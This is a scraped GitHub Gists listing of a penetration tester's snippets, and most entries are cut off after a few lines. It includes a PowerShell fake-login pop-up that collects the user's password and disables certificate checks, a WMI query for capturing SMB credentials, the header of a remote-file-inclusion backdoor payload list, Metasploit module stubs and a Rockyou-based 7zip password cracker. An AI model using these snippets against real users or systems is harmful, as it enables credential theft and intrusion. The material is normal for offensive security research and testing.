Skip to content

Instantly share code, notes, and snippets.


Rob Fuller mubix

Block or report user

Report or block mubix

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
mubix / WMIQuery_SMBAuth.ps1
Created Dec 18, 2015
Using a WMI Query to be able to capture credentials
View WMIQuery_SMBAuth.ps1
$share = "\\\share"
$query = "Associators of {win32_LogicalShareSecuritySetting='$share'}"
Get-WmiObject -query $query
Obtained using Impacket's example
View rfi-list.txt
# Compiled by RSnake 02/01/2010 Mostly from milw0rm and elsewhere.
# Change XXpathXX to the path of your backdoor. Note that you may need to
# try it against every directory on the target and because of how this was
# culled you may need to add a question mark to your own XXpathXX URL:
# Eg: XXpathXX =>
mubix / set_wallpaper.rb
Created Aug 19, 2015
Set Wallpaper Metasploit Post Module from Metasploit Minute
View set_wallpaper.rb
# This module requires Metasploit:
# Current source:
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File
mubix / wallpaper.rb
Created Aug 19, 2015
Wallpaper Script from Metasploit Minute
View wallpaper.rb
#Change Wallpaper
session = client
key = "HKCU"
wallpaper = "kerby.bmp"
based = "/root/kerby.bmp"
# based = File.join(Msf::Config.install_root, "data", wallpaper)
bgcolor = "0 0 0" # set to 255 255 255 for white
refresh_cmd = "rundll32.exe user32.dll, UpdatePerUserSystemParameters"

Cipher Text #1:


Cipher Text #2:

View Reset-KrbtgtKeyInteractive.ps1
Release Notes:
Author: Jared Poeppelman, Microsoft
First version published on TechNet Script Gallery
function Test-Command
mubix / powershellpopup.ps1
Created Jan 12, 2015
Powershell Popups, proxy aware and auth aware
View powershellpopup.ps1
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object$cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('');
mubix / get_rss.rb
Created Dec 23, 2014
Parse Site List for RSS
View get_rss.rb
#!/usr/bin/env ruby
require 'feedbag'
require 'net/http'
source = Net::HTTP.get('', '/blog/cyber-security-blogs/')
body = source.split('"')
rss = []
body.each_with_index do |ob, index|
mubix / 7zbrute.rb
Created Nov 4, 2014
7zip Cracking on the cheap
View 7zbrute.rb
#!/usr/bin/env ruby
# Need some help with this cracking script.
# Problems:
# 1) Slow, going through a large list like Rockyou takes forever
# 2) If there is no header encryption, 7z extracts to the target location
# then tries to decrypt, so threading would be painful
# 3) I need to know when the correct password is used and due to #2
# with threading that would be very difficult.
View hfs_script_inject.rb
# This module requires Metasploit: http//
# Current source:
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Reank = NormalRanking
You can’t perform that action at this time.